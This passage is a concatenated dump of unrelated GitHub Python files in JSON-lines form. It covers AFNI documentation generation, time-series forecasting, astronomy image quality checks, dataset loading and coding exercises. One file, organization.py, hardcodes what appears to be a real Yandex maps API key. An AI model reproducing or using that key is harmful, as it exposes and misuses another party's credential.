pytest.main()\n","repo_name":"UncleLiketao/API_AutoTest_Framework_Python","sub_path":"TestCase/test_launcher3/test_launcher_is_config.py","file_name":"test_launcher_is_config.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24477306821","text":"#!/usr/bin/env python\n\nimport sys as sys\nimport os\n\nfrom afnipy import afni_util as au\n\nprint(\"+* [PT: Jan 13, 2022] Turning this off at the moment; \"\n \"maybe revisit later\")\nsys.exit(0)\n\n\nTHIS_PROG = 'make_substeps_of_quickbuilds.py'\nNUM_ARGS = 1\n\n# ===================================================================\n\nVERSION = \"1.0\"\nVER_DATE = \"Mar 29, 2018\"\nAUTHOR = \"PA Taylor (NIMH, NIH)\"\n\nhelp_string = '''\n--------------------------------------------------------------------\nHelpfile for: *** %s ***\nVersion num: %s\nVersion dat: %s\nWritten by: %s\n\nTakes %d arguments: \n 1) and an output directory name\n--------------------------------------------------------------------\n\n''' % (THIS_PROG, VERSION, VER_DATE, AUTHOR, NUM_ARGS)\n\n# =================================================================\n\n\n\n\n# =================================================================\n\ndef make_hidden_code_block_header( starthidden='True', \n hcb_format='none',\n label='- show script y/n -',\n nempty=2,\n lspace=3):\n \"\"\"\n Make a hidden-code-block in RST; a couple params get entered.\n \"\"\"\n\n lpad = ' '*lspace\n jstr = '\\n' + lpad\n\n hcb_list = []\n hcb_list.append( '''.. hidden-code-block:: {}'''.format(hcb_format))\n hcb_list.append( ''' :starthidden: {}'''.format(starthidden))\n hcb_list.append( ''' :label: {}'''.format(label))\n\n for i in range(nempty):\n hcb_list.append( '')\n\n return lpad + jstr.join(hcb_list)\n\ndef make_code_block_header( cb_format='none',\n nempty=2):\n \"\"\"\n Make a code-block in RST; a couple params get entered.\n \"\"\"\n\n jstr = '\\n'\n\n cb_list = []\n cb_list.append( '''.. code-block:: {}'''.format(cb_format))\n\n for i in range(nempty):\n cb_list.append( '')\n\n return jstr.join(cb_list)\n\n# ---------------------------------------------------------------------\n\ndef get_arg(aa):\n Narg = len(aa)\n \n if Narg == 0:\n print( help_string )\n sys.exit(0)\n elif Narg < NUM_ARGS:\n sys.exit(\"** ERROR: too few args!\\n\"\n \" Need one input file name (contains all tips),\\n\"\n \" and an output fname.\")\n elif Narg > NUM_ARGS:\n sys.exit(\"** ERROR: too many args! See help.\")\n else:\n odir = aa[0] # output dir name\n\n print( \"++ odir : {}\".format( odir ))\n\n return odir\n\n# ---------------------------------------------------------------------\n\ndef parse_data_file_top(H, lspace=3):\n \"\"\"\n We assume each top-of-file contains 5 lines:\n + \"Quick\" ... comment\n + comment about tcsh/bash\n + actual command\n + comment about tcsh/bash\n + actual command\n \"\"\"\n \n lpad = \" \"*lspace\n\n N = len(H)\n nstart = -1\n\n for ii in range(N):\n line = H[ii].split()\n if len(line) > 1 :\n if line[1] == \"Quick\" :\n nstart = ii\n break\n\n if nstart < 0 :\n print(\"** ERROR: couldn't find keyword 'Quick' starting a line!\\n\"\n \" I am lost with how to process this file\")\n sys.exit(1)\n\n out = []\n # skip \"Quick\" line\n for ii in [nstart+1, nstart+3]:\n out.append(lpad + \"* *... \" + H[ii][1:].strip()[:-1] + '*::\\n')\n out.append(lpad + \" \" + \" \" + H[ii+1][1:].strip() + '\\n')\n\n return out\n\n# ---------------------------------------------------------------------\n\ndef write_out_quickbuild_substep(ofile, ttt):\n fff = open(ofile, 'w')\n\n fff.writelines(ttt)\n fff.close()\n\n\n# ====================================================================\n\nclass quickbuild:\n\n def __init__(self, name, tip, num):\n self.package = name\n self.links = []\n self.nlinks = 0\n\n# ====================================================================\n\nif __name__==\"__main__\":\n\n # --------------------- get input ------------------------\n\n print( \"++ Command line:\\n {}\".format(' '.join(sys.argv) ))\n odir = get_arg(sys.argv[1:])\n\n # where to get stuff, from the interweb\n base_path = \"https://raw.githubusercontent.com/afni/afni/\"\n base_path+= \"master/src/other_builds\"\n\n # ----------------------------------------------------------\n this_sys = 'linux_ubuntu_20_64'\n oname_sys = 'substep_quickbuild_' + this_sys\n \n list_files = []\n list_comms = []\n\n comm = '''To install packages requiring admin privileges '''\n comm+= '''('sudo' password required)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_a_admin.txt')\n list_comms.append(comm)\n \n comm = '''To install other dependencies (**don't** use 'sudo' here)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_b_user.tcsh')\n list_comms.append(comm)\n\n comm = '''To niceify your terminal (optional, but useful)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_c_nice.tcsh')\n list_comms.append(comm)\n \n # download files\n nfiles = len(list_files)\n list_data = []\n list_curl = []\n\n for ii in range(nfiles):\n ifile = list_files[ii]\n curler = \"curl -O %s/%s\" % (base_path, ifile)\n os.system(curler)\n list_curl.append(curler)\n\n fff = open(ifile, 'r')\n data = fff.readlines()\n fff.close()\n list_data.append(data)\n\n\n # build text string\n otext = \"\"\n\n otext+= '\\n\\n'\n\n otext+= '''This is a briefer form of the above setup instructions.\\n'''\n otext+= '''It includes downloading the Bootcamp data and running\\n'''\n otext+= '''the system check (so don't forget to check that!).\\n'''\n\n otext+= '\\n\\n'\n\n otext+= '''There are 3 scripts to run.\\n'''\n otext+= '''To download them, copy+paste:'''\n otext+= '\\n\\n'\n\n # code-block: curl commands\n hdr_cb = make_code_block_header()\n otext+= hdr_cb\n otext+= ' ' + 'cd\\n'\n otext+= ' ' + '\\n '.join(list_curl)\n otext+= '\\n\\n'\n\n otext+= \"Then run each of them, as described below.\\n\"\n otext+= \"(Each creates a log file, for checking and/or asking questions.)\\n\"\n otext+= '\\n\\n'\n\n lspace = 3\n lpad = ' '*lspace\n\n # hidden-code-block: each file\n for ii in range(nfiles):\n\n otext+= \"#. \" + list_comms[ii]\n otext+= '\\n\\n'\n\n run_cmd = parse_data_file_top(list_data[ii])\n otext+= '\\n'.join(run_cmd)\n otext+= '\\n\\n'\n\n hdr_hcb = make_hidden_code_block_header()\n otext+= hdr_hcb\n jstr = lpad + ' '\n otext+= ' ' + jstr.join(list_data[ii])\n otext+= '\\n\\n'\n otext+= lpad + '|\\n'\n\n write_out_quickbuild_substep(odir + '/' + oname_sys + '.rst', \n otext)\n\n print(\"++ Done writing RST for quickbuild instructions!\")\n\n sys.exit(0)\n","repo_name":"afni/afni_doc","sub_path":"python_help_scripts/make_substeps_of_quickbuilds.py","file_name":"make_substeps_of_quickbuilds.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"29809650782","text":"\ndef search(sequence, expected, finder):\n for elem in sequence:\n if finder(elem) == expected:\n return elem\n raise RuntimeError(f\"Could not find element {expected}\")\n\n\nfriends = [\n {\"name\": \"Bob Rock\", \"age\": 24},\n {\"name\": \"Jack Daniels\", \"age\": 25},\n {\"name\": \"Stew A\", \"age\": 26}]\n\n\n# def get_name(friend):\n# return friend[\"name\"]\n\n\n# print(search(friends, \"Bob Rock\", get_name))\n\nprint(search(friends, \"Bob Rock\", lambda friend: friend[\"name\"]))\n","repo_name":"aliaksei-d/rest_api_with_flask_and_python_full_version","sub_path":"first_class_fynctions.py","file_name":"first_class_fynctions.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70943720188","text":"import pandas as pd\nimport numpy as np\n\ntry:\n from autots import AutoTS, model_forecast\nexcept ImportError:\n print('Does not found AutoTS library. Continue...')\n\nfrom pytsbe.data.forecast_output import ForecastResults\nfrom pytsbe.models.forecast import Forecaster\n\nimport logging\nlogging.raiseExceptions = False\n\n\nclass AutoTSForecaster(Forecaster):\n \"\"\"\n Class for time series forecasting with AutoTS library\n Source code: https://github.com/winedarksea/AutoTS\n \"\"\"\n\n def __init__(self, **params):\n super().__init__(**params)\n default_params = {'frequency': 'infer', 'prediction_interval': 0.9,\n 'ensemble': 'all', 'model_list': 'superfast',\n 'max_generations': 10, 'num_validations': 2}\n if params is not None:\n self.params = {**default_params, **params}\n else:\n self.params = default_params\n\n def fit_univariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int, **kwargs):\n frequency = self.params.get('frequency')\n prediction_interval = self.params.get('prediction_interval')\n ensemble = self.params.get('ensemble')\n model_list = self.params.get('model_list')\n max_generations = self.params.get('max_generations')\n num_validations = self.params.get('num_validations')\n\n self.model = AutoTS(forecast_length=forecast_horizon,\n frequency=frequency,\n prediction_interval=prediction_interval,\n ensemble=ensemble,\n model_list=model_list,\n max_generations=max_generations,\n num_validations=num_validations,\n validation_method=\"backwards\")\n\n self.model.fit(historical_values, date_col='datetime', value_col='value')\n\n def fit_multivariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n target_column: str, predictors_columns: list, **kwargs):\n raise NotImplementedError('AutoTs does not support fit for multivariate time series forecasting')\n\n def predict_univariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n **kwargs) -> ForecastResults:\n \"\"\" Use obtained model to make predictions \"\"\"\n forecasts_df = model_forecast(model_name=self.model.best_model_name,\n model_param_dict=self.model.best_model_params,\n model_transform_dict=self.model.best_model_transformation_params,\n df_train=historical_values.set_index('datetime'),\n forecast_length=forecast_horizon,\n frequency=self.params.get('frequency'),\n prediction_interval=self.params.get('prediction_interval'),\n no_negatives=False)\n\n forecast = np.ravel(np.array(forecasts_df.forecast['value']))\n # For now save only forecasts - possible to extend\n result = ForecastResults(predictions=forecast)\n return result\n\n def predict_multivariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n target_column: str, predictors_columns: list, **kwargs):\n raise NotImplementedError('AutoTs forecaster does not support predict for multivariate time series forecasting')\n","repo_name":"ITMO-NSS-team/pytsbe","sub_path":"pytsbe/models/autots_forecaster.py","file_name":"autots_forecaster.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"6"} +{"seq_id":"16103339512","text":"def check(value, banArr):\n for i in range (0, len(banArr)):\n for j in range (0, len(str(value))):\n if (int(str(value)[j]) == banArr[i]):\n return 1\n return 0\n\n\ngoal = int(input());\nbanNum = int(input());\nbanArr = list(map(int, input().split()))\n\n\nupside = goal\nwhile check(upside, banArr):\n upside += 1\n\n\ndownside = goal\nwhile check(downside, banArr) and downside >= 0:\n downside -= 1\n\nif (abs(goal - 100) <= abs(goal - upside) or abs(goal - 100) <= abs(goal - downside)):\n print(int(abs(goal - 100)))\nelif (abs(goal - upside) >= abs(goal - downside)):\n print(int(abs(goal - downside)) + len(str(int(downside))))\nelse:\n print(int(abs(goal - upside)) + len(str(int(upside))))\n\nexit (0)","repo_name":"hynoes/baekjoon","sub_path":"bj1157_soomin4.py","file_name":"bj1157_soomin4.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"20165322899","text":"# Напишите функцию, которая сохраняет созданный в\n# прошлом задании файл в формате CSV.\nimport json\nimport csv\n\n\ndef json_to_csv(filename: str):\n with open(f'{filename}.json', 'r') as f_inp:\n data = json.load(f_inp)\n rows = []\n for level, users in data.items():\n for id, name in users.items():\n rows.append({'level': level,\n 'name': name,\n 'id': id})\n with open(f'{filename}.csv', 'w', newline='') as res:\n csv_write = csv.DictWriter(res, fieldnames=['level',\n 'name',\n 'id'])\n csv_write.writeheader()\n csv_write.writerows(rows)\n\n\ndef read_csv(filename: str):\n with open(f'{filename}.csv', 'r', encoding='UTF-8') as inp:\n data = inp.read().split('\\n')\n res = []\n for value in data[:-1]:\n print(value)\n level, name, id = value[:].split(',')\n res.append({'id': f'{id:06}', 'level': level, 'name': name, 'hash': hash(id + name)})\n\n with open(f'{filename}new.json', 'w', encoding='UTF-8') as out:\n json.dump(res, out, indent=4)\n\n\nif __name__ == '__main__':\n # json_to_csv('users')\n read_csv('users')\n","repo_name":"wahek/pythonDepth_8_hw","sub_path":"pythonDepth_8/task3_3.py","file_name":"task3_3.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8460021976","text":"import torch\nimport utils as utils\nfrom torch.utils.data import Dataset,DataLoader\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport config as config\nclass RummorDataset(Dataset):\n\n def __init__(self,model=\"train\"):\n super(RummorDataset, self).__init__()\n\n self.contents,self.labels,self.comments,self.likes,self.reposts =utils.get_df()\n self.comments,self.likes,self.reposts=torch.tensor(self.comments).reshape(1, -1),torch.tensor(self.likes).reshape(1, -1),torch.tensor(self.reposts).reshape(1, -1)\n minmax_c = MinMaxScaler()\n minmax_c.fit(self.comments)\n self.comments = minmax_c.transform(self.comments)\n minmax_l = MinMaxScaler()\n minmax_l.fit(self.likes)\n self.likes = minmax_l.transform(self.likes)\n minmax_r = MinMaxScaler()\n minmax_r.fit(self.reposts)\n self.reposts = minmax_r.transform(self.reposts)\n self.contents=utils.key_to_index(self.contents,utils.word2vec,config.num_words)\n\n self.maxlen=utils.get_maxlength(self.contents)\n\n self.contents=utils.padding_truncating(self.contents,self.maxlen)\n minmax_c = MinMaxScaler()\n x_train,x_test,c_train,c_test,l_train,l_test,r_train,r_test,y_train,y_test=train_test_split(self.contents,self.comments.reshape(-1).tolist(),self.likes.reshape(-1).tolist(),self.reposts.reshape(-1).tolist(),self.labels,test_size=0.2,shuffle=True,random_state=0)\n if model==\"train\":\n self.contents=x_train\n self.comments=c_train\n self.likes=l_train\n self.reposts=r_train\n self.labels=y_train\n elif model==\"test\":\n self.contents = x_test\n self.comments =c_test\n self.likes=l_test\n self.reposts=r_test\n self.labels = y_test\n\n def __getitem__(self, item):\n return torch.tensor(self.contents[item]),torch.tensor(self.comments[item]).view(-1,1),torch.tensor(self.likes[item]).view(-1,1),torch.tensor(self.reposts[item]).view(-1,1),torch.tensor(self.labels[item])\n\n def __len__(self):\n return len(self.contents)\n\ndef get_dataloader(model=\"train\"):\n dataset=RummorDataset(model=model)\n return DataLoader(dataset,batch_size=config.batch_size,shuffle=True if model==\"train\" else False)\n\n\n","repo_name":"Levi-Ackman/AI_EXP_Tasks_2","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"6122366241","text":"# -- coding: utf-8 --\n\nimport sqlalchemy\nfrom sqlalchemy import orm\nfrom .db_session import SqlAlchemyBase\nfrom flask_login import UserMixin\nfrom sqlalchemy_serializer import SerializerMixin\nimport requests\n\n\nclass Organization(SqlAlchemyBase, UserMixin, SerializerMixin):\n __tablename__ = 'organizations'\n\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True, autoincrement=True)\n\n organization_name = sqlalchemy.Column(sqlalchemy.Text)\n\n description = sqlalchemy.Column(sqlalchemy.Text)\n\n owner_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey(\"users.id\"), nullable=True)\n\n address = sqlalchemy.Column(sqlalchemy.Text)\n\n contact_number = sqlalchemy.Column(sqlalchemy.Text)\n\n owner = orm.relation('User', back_populates='organizations')\n\n logo = sqlalchemy.Column(sqlalchemy.Text)\n\n address_ll = sqlalchemy.Column(sqlalchemy.Text)\n\n def set_address_ll(self):\n api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n\n params = {\n \"apikey\": '40d1649f-0493-4b70-98ba-98533de7710b',\n \"format\": 'json',\n \"geocode\": self.address\n }\n response = requests.get(api_server, params=params)\n if response:\n json_response = response.json()\n toponym = json_response[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n toponym_address = toponym[\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\n self.address_ll = \",\".join(toponym[\"Point\"][\"pos\"].split())\n self.address = toponym_address\n\n map_params = {\n \"ll\": self.address_ll,\n \"spn\": \"0.005,0.005\",\n \"l\": \"map\",\n 'pt': ','.join(self.address_ll.split() + ['org'])\n }\n\n map_api_server = \"http://static-maps.yandex.ru/1.x/\"\n response = requests.get(map_api_server, params=map_params)\n map_file = f\"static/img/{self.address_ll}.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n else:\n raise Exception('Address is wrong')\n","repo_name":"oqyshi/Oqyshi","sub_path":"data/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21158852810","text":"#!/usr/bin/env python\n\n# Routine to check quality of LOFAR images\nfrom __future__ import print_function\nfrom __future__ import division\nfrom past.utils import old_div\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport os,sys\nimport os.path\nfrom quality_parset import option_list\nfrom options import options,print_options\nfrom astropy.io import fits\nfrom astropy.table import Table\ntry:\n import bdsf as bdsm\nexcept ImportError:\n import lofar.bdsm as bdsm\nfrom auxcodes import report,get_rms,warn,die,sepn,get_centpos\nimport numpy as np\nfrom crossmatch_utils import match_catalogues,filter_catalogue,select_isolated_sources,bootstrap\nfrom quality_make_plots import plot_flux_ratios,plot_flux_errors,plot_position_offset\nfrom facet_offsets import label_table,RegPoly,plot_offsets\nfrom dr_checker import do_dr_checker\nfrom surveys_db import SurveysDB,get_id,use_database\n\n#Define various angle conversion factors\narcsec2deg=1.0/3600\narcmin2deg=1.0/60\ndeg2rad=old_div(np.pi,180)\ndeg2arcsec = 1.0/arcsec2deg\nrad2deg=180.0/np.pi\narcmin2rad=arcmin2deg*deg2rad\narcsec2rad=arcsec2deg*deg2rad\nrad2arcmin=1.0/arcmin2rad\nrad2arcsec=1.0/arcsec2rad\nsteradians2degsquared = (180.0/np.pi)**2.0\ndegsquared2steradians = 1.0/steradians2degsquared\n\ndef logfilename(s,options=None):\n if options is None:\n options=o\n if options['logging'] is not None:\n return options['logging']+'/'+s \n else:\n return None\n\ndef filter_catalog(singlecat,matchedcat,fitsimage,outname,auxcatname,options=None):\n if options is None:\n options = o\n\n if options['restart'] and os.path.isfile(outname):\n warn('File ' + outname +' already exists, skipping source filtering step')\n else:\n\n matchedcat = Table.read(matchedcat)\n singlecat = Table.read(singlecat)\n\n fitsimage = fits.open(fitsimage)\n\n fieldra = fitsimage[0].header['CRVAL1']\n fielddec = fitsimage[0].header['CRVAL2']\n fitsimage.close()\n\n print('Originally',len(matchedcat),'sources')\n matchedcat=filter_catalogue(matchedcat,fieldra,fielddec,3.0)\n\n print('%i sources after filtering for 3.0 deg from centre' % len(matchedcat))\n\n matchedcat=matchedcat[matchedcat['DC_Maj']<10.0] # ERROR!\n\n print('%i sources after filtering for sources over 10arcsec in LOFAR' % len(matchedcat))\n\n # not implemented yet!\n #tooextendedsources_aux = np.array(np.where(matchedcat[1].data[options['%s_match_majkey2'%auxcatname]] > options['%s_filtersize'%auxcatname])).flatten()\n #print '%s out of %s sources filtered out as over %sarcsec in %s'%(np.size(tooextendedsources_aux),len(allsources),options['%s_filtersize'%auxcatname],auxcatname)\n\n matchedcat=select_isolated_sources(matchedcat,30.0)\n print('%i sources after filtering for isolated sources in LOFAR' % len(matchedcat))\n\n matchedcat.write(outname)\n\ndef sfind_image(catprefix,pbimage,nonpbimage,sfind_pixel_fraction,options=None):\n\n if options is None:\n options = o\n f = fits.open(nonpbimage)\n imsizex = f[0].header['NAXIS1']\n imsizey = f[0].header['NAXIS2']\n f.close()\n kwargs={}\n if options['sfind_pixel_fraction']<1.0:\n lowerx,upperx = int(((1.0-sfind_pixel_fraction)/2.0)*imsizex),int(((1.0-sfind_pixel_fraction)/2.0)*imsizex + sfind_pixel_fraction*imsizex)\n lowery,uppery = int(((1.0-sfind_pixel_fraction)/2.0)*imsizey),int(((1.0-sfind_pixel_fraction)/2.0)*imsizey + sfind_pixel_fraction*imsizey)\n kwargs['trim_box']=(lowerx,upperx,lowery,uppery)\n\n if options['restart'] and os.path.isfile(catprefix +'.cat.fits'):\n warn('File ' + catprefix +'.cat.fits already exists, skipping source finding step')\n else:\n img = bdsm.process_image(pbimage, detection_image=nonpbimage, thresh_isl=4.0, thresh_pix=5.0, rms_box=(160,50), rms_map=True, mean_map='zero', ini_method='intensity', adaptive_rms_box=True, adaptive_thresh=150, rms_box_bright=(60,15), group_by_isl=False, group_tol=10.0,output_opts=True, output_all=True, atrous_do=True,atrous_jmax=4, flagging_opts=True, flag_maxsize_fwhm=0.5,advanced_opts=True, ncores=options['NCPU'], blank_limit=None,**kwargs)\n img.write_catalog(outfile=catprefix +'.cat.fits',catalog_type='srl',format='fits',correct_proj='True')\n img.export_image(outfile=catprefix +'.rms.fits',img_type='rms',img_format='fits',clobber=True)\n img.export_image(outfile=catprefix +'.resid.fits',img_type='gaus_resid',img_format='fits',clobber=True)\n img.export_image(outfile=catprefix +'.pybdsmmask.fits',img_type='island_mask',img_format='fits',clobber=True)\n img.write_catalog(outfile=catprefix +'.cat.reg',catalog_type='srl',format='ds9',correct_proj='True')\n\ndef crossmatch_image(lofarcat,auxcatname,options=None,catdir='.'):\n\n if options is None:\n options = o\n auxcat = options[auxcatname]\n crossmatchname=lofarcat + '_' + auxcatname + '_match.fits'\n if options['restart'] and os.path.isfile(crossmatchname):\n warn('File ' + crossmatchname+ ' already exists, skipping source matching step')\n t=Table.read(crossmatchname)\n matches=len(t)\n del(t)\n else:\n t=Table.read(lofarcat)\n tab=Table.read(catdir+'/'+auxcat)\n matches=match_catalogues(t,tab,o[auxcatname+'_matchrad'],auxcatname)\n t=t[~np.isnan(t[auxcatname+'_separation'])]\n t.write(lofarcat+'_'+auxcatname+'_match.fits')\n return matches\n \ndef do_plot_facet_offsets(t,regfile,savefig=None):\n ''' convenience function to plot offsets '''\n if savefig is not None and os.path.isfile(savefig):\n warn('Figure file %s exists, not re-making it' % savefig)\n else:\n cra,cdec=get_centpos()\n r=RegPoly(regfile,cra,cdec)\n if isinstance(t,str):\n t=Table.read(t)\n if 'Facet' not in t.columns:\n r.add_facet_labels(t)\n plot_offsets(t,r.clist,'red')\n if savefig is not None:\n plt.savefig(savefig)\n\nif __name__=='__main__':\n # Main loop\n if len(sys.argv)<2:\n warn('quality_pipeline.py must be called with at least one parameter file\\nor a command-line option list.\\nE.g \"pipeline.py example.cfg second_example.cfg --solutions-robust=0.1\"\\nSee below for a complete list of possible options with their default values.')\n print_options(option_list)\n sys.exit(1)\n\n o=options(sys.argv[1:],option_list)\n if o['pbimage'] is None:\n die('pbimage must be specified')\n if o['nonpbimage'] is None:\n die('nonpbimage must be specified')\n if o['list'] is not None:\n # fix up the new list-type options\n for i,cat in enumerate(o['list']):\n try:\n o[cat]=o['filenames'][i]\n except:\n pass\n try:\n o[cat+'_matchrad']=o['radii'][i]\n except:\n pass\n try:\n o[cat+'_fluxfactor']=o['fluxfactor'][i]\n except:\n pass\n \n if \"DDF_PIPELINE_CATALOGS\" in list(os.environ.keys()):\n o['catdir']=os.environ[\"DDF_PIPELINE_CATALOGS\"]\n\n if o['logging'] is not None and not os.path.isdir(o['logging']):\n os.mkdir(o['logging'])\n \n # pybdsm source finding\n sfind_image(o['catprefix'],o['pbimage'],o['nonpbimage'],o['sfind_pixel_fraction'],options=o)\n\n # facet labels -- do this now for generality\n cra,cdec=get_centpos()\n t=Table.read(o['catprefix'] + '.cat.fits')\n tesselfile=o['catprefix']+'.tessel.reg'\n if 'Facet' not in t.columns:\n t=label_table(t,tesselfile,cra,cdec)\n t.write(o['catprefix'] + '.cat.fits',overwrite=True)\n\n catsources=len(t)\n \n # matching with catalogs\n removelist=[]\n for cat in o['list']:\n print('Doing catalogue',cat)\n if crossmatch_image(o['catprefix'] + '.cat.fits',cat,catdir=o['catdir'])>10:\n filter_catalog(o['catprefix'] + '.cat.fits',o['catprefix']+'.cat.fits_'+cat+'_match.fits',o['pbimage'],o['catprefix']+'.cat.fits_'+cat+'_match_filtered.fits',cat,options=o)\n else:\n print('Insufficient matches, abandoning catalogue')\n removelist.append(cat)\n for cat in removelist:\n o['list'].remove(cat)\n\n # Astrometric plots\n if 'FIRST' in o['list']:\n report('Plotting position offsets')\n plot_position_offset('%s.cat.fits_FIRST_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_FIRST_match_filtered_positions.png'%o['catprefix'],'FIRST',options=o)\n\n t=Table.read(o['catprefix']+'.cat.fits_FIRST_match_filtered.fits')\n bsra=np.percentile(bootstrap(t['FIRST_dRA'],np.mean,10000),(16,84))\n bsdec=np.percentile(bootstrap(t['FIRST_dDEC'],np.mean,10000),(16,84))\n mdra=np.mean(t['FIRST_dRA'])\n mddec=np.mean(t['FIRST_dDEC'])\n print('Mean delta RA is %.3f arcsec (1-sigma %.3f -- %.3f arcsec)' % (mdra,bsra[0],bsra[1]))\n print('Mean delta DEC is %.3f arcsec (1-sigma %.3f -- %.3f arcsec)' % (mddec,bsdec[0],bsdec[1]))\n first_ra=mdra\n first_dec=mddec\n \n report('Plotting per-facet position offsets')\n do_plot_facet_offsets(t,tesselfile,o['catprefix']+'.cat.fits_FIRST_match_filtered_offsets.png')\n t['FIRST_dRA']-=mdra\n t['FIRST_dDEC']-=mddec\n do_plot_facet_offsets(t,tesselfile,o['catprefix']+'.cat.fits_FIRST_match_filtered_offsets_registered.png')\n\n report('Plotting flux ratios')\n # Flux ratio plots (only compact sources)\n plot_flux_ratios('%s.cat.fits_FIRST_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_FIRST_match_filtered_fluxerrors.png'%o['catprefix'],options=o)\n else:\n first_ra=None\n first_dec=None\n \n report('Plotting flux scale comparison')\n # Flux scale comparison plots\n if 'TGSS' in o['list']:\n plot_flux_errors('%s.cat.fits_TGSS_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_TGSS_match_filtered_fluxratio.png'%o['catprefix'],'TGSS',options=o)\n t=Table.read(o['catprefix']+'.cat.fits_TGSS_match_filtered.fits')\n ratios=old_div(t['Total_flux'],(old_div(t['TGSS_Total_flux'],o['TGSS_fluxfactor'])))\n bsratio=np.percentile(bootstrap(ratios,np.median,10000),(16,84))\n print('Median LOFAR/TGSS ratio is %.3f (1-sigma %.3f -- %.3f)' % (np.median(ratios),bsratio[0],bsratio[1]))\n tgss_scale=np.median(ratios)\n else:\n tgss_scale=None\n if 'NVSS' in o['list']:\n t=Table.read(o['catprefix']+'.cat.fits_NVSS_match_filtered.fits')\n t=t[t['Total_flux']>30e-3]\n ratios=old_div(t['Total_flux'],t['NVSS_Total_flux'])\n bsratio=np.percentile(bootstrap(ratios,np.median,10000),(16,84))\n print('Median LOFAR/NVSS ratio is %.3f (1-sigma %.3f -- %.3f)' % (np.median(ratios),bsratio[0],bsratio[1]))\n nvss_scale=np.median(ratios)\n else:\n nvss_scale=None\n # Noise estimate\n hdu=fits.open(o['pbimage'])\n imagenoise = get_rms(hdu)\n rms=imagenoise*1e6\n print('An estimate of the image noise is %.3f muJy/beam' % rms)\n drs=do_dr_checker(o['catprefix']+'.cat.fits',o['pbimage'],verbose=False,peak=0.4)\n dr=np.median(drs)\n print('Median dynamic range is',dr)\n\n # fit source counts\n if o['fit_sourcecounts']:\n from fit_sourcecounts import do_fit_sourcecounts\n sc_norm,sc_index,scale=do_fit_sourcecounts(rms=imagenoise)\n else:\n sc_norm=sc_index=scale=None\n \n print(rms,dr,catsources,first_ra,first_dec,tgss_scale,nvss_scale,sc_norm,sc_index,scale)\n\n if use_database():\n id=get_id()\n with SurveysDB() as sdb:\n result=sdb.create_quality(id)\n result['rms']=float(rms)\n result['dr']=float(dr)\n result['catsources']=int(catsources)\n if first_ra is not None:\n result['first_ra']=float(first_ra)\n result['first_dec']=float(first_dec)\n if tgss_scale is not None:\n result['tgss_scale']=float(tgss_scale)\n if nvss_scale is not None:\n result['nvss_scale']=float(nvss_scale)\n if sc_norm is not None:\n result['sc_norm']=float(sc_norm)\n result['sc_index']=float(sc_index)\n result['sc_scale']=float(scale)\n \n sdb.set_quality(result)\n","repo_name":"mhardcastle/ddf-pipeline","sub_path":"scripts/quality_pipeline.py","file_name":"quality_pipeline.py","file_ext":"py","file_size_in_byte":12366,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"32469686798","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def removeZeroSumSublists(self, head: ListNode) -> ListNode:\n dummy = ListNode(0)\n dummy.next = head\n cur = dummy\n sums = deque([0])\n sum_last_nodes = {0: dummy}\n \n while cur.next:\n next_sum = sums[-1] + cur.next.val\n \n if next_sum in sum_last_nodes:\n while sums[-1] != next_sum:\n sum_last_nodes.pop(sums.pop())\n sum_last_nodes[next_sum].next = cur.next.next\n cur = sum_last_nodes[next_sum]\n else:\n sums.append(next_sum)\n cur = cur.next\n sum_last_nodes[next_sum] = cur\n \n return dummy.next\n","repo_name":"MdAbedin/leetcode","sub_path":"1101 - 1200/1171 Remove Zero Sum Consecutive Nodes from Linked List.py","file_name":"1171 Remove Zero Sum Consecutive Nodes from Linked List.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"30357883471","text":"from pyface.qt import is_qt5\nfrom pyface.qt.QtCore import QPoint, Qt, QUrl, Signal\nfrom pyface.qt.QtGui import QImage, QPainter, QPalette, QSizePolicy\nfrom pyface.qt.QtMultimedia import (\n QAudio,\n QMediaPlayer,\n QVideoFrame,\n)\nfrom pyface.qt.QtMultimediaWidgets import 